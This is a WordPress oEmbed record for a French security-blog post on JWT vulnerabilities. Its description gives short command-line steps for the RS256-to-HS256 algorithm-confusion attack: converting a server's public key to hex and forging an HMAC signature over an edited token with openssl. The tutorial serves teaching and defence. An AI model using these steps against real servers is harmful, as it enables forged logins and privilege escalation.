{"version":"1.0","provider_name":"S\u00e9curiser votre site","provider_url":"https:\/\/www.searchevolution.com\/security","author_name":"Germain","author_url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/","title":"Vuln\u00e9rabilit\u00e9 dans les tokens JWT - S\u00e9curiser votre site","type":"rich","width":600,"height":338,"html":"<blockquote class=\"wp-embedded-content\" data-secret=\"t6BLvkWHPz\"><a href=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/\">Vuln\u00e9rabilit\u00e9 dans les tokens JWT<\/a><\/blockquote><iframe sandbox=\"allow-scripts\" security=\"restricted\" src=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/embed\/#?secret=t6BLvkWHPz\" width=\"600\" height=\"338\" title=\"&laquo; Vuln\u00e9rabilit\u00e9 dans les tokens JWT &raquo; &#8212; S\u00e9curiser votre site\" data-secret=\"t6BLvkWHPz\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\" class=\"wp-embedded-content\"><\/iframe><script type=\"text\/javascript\">\n\/* <![CDATA[ *\/\n\/*! This file is auto-generated *\/\n!function(d,l){\"use strict\";l.querySelector&&d.addEventListener&&\"undefined\"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!\/[^a-zA-Z0-9]\/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret=\"'+t.secret+'\"]'),o=l.querySelectorAll('blockquote[data-secret=\"'+t.secret+'\"]'),c=new RegExp(\"^https?:$\",\"i\"),i=0;i<o.length;i++)o[i].style.display=\"none\";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute(\"style\"),\"height\"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):\"link\"===t.message&&(r=new URL(s.getAttribute(\"src\")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener(\"message\",d.wp.receiveEmbedMessage,!1),l.addEventListener(\"DOMContentLoaded\",function(){for(var e,t,s=l.querySelectorAll(\"iframe.wp-embedded-content\"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute(\"data-secret\"))||(t=Math.random().toString(36).substring(2,12),e.src+=\"#?secret=\"+t,e.setAttribute(\"data-secret\",t)),e.contentWindow.postMessage({message:\"ready\",secret:t},\"*\")},!1)))}(window,document);\n\/* ]]> *\/\n<\/script>\n","description":"Structure d&#8217;un token header.payload.secret Les sections sont encod\u00e9s en base64 Structure d&#8217;un header {&#8220;typ&#8221;:&#8221;JWT&#8221;,&#8221;alg&#8221;:&#8221;RS256&#8243;} Si on a la cl\u00e9 publique du serveur, on peut r\u00e9encoder le token -Changer l&#8217;algorithme dans le header par HS256 (HS256 est sym\u00e9trique, rs256 est asym\u00e9trique) cat a.pem | xxd &#8211; p | tr -d &#8220;\\n&#8221; (convertit la cl\u00e9 publique du serveur &#8220;a.pem&#8221; au format hexad\u00e9cimal pour utilisation avec openssl \u00e0 l&#8217;\u00e9tape suivante) G\u00e9n\u00e9rer une signature HMAC avec notre cl\u00e9 g\u00e9n\u00e9r\u00e9e pr\u00e9c\u00e9demment et le token \u00e9dit\u00e9 (les deux premi\u00e8res sections) echo -n &#8220;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ&#8221; | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505592d2d2d2d2d0a (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0 Convertit la signature"}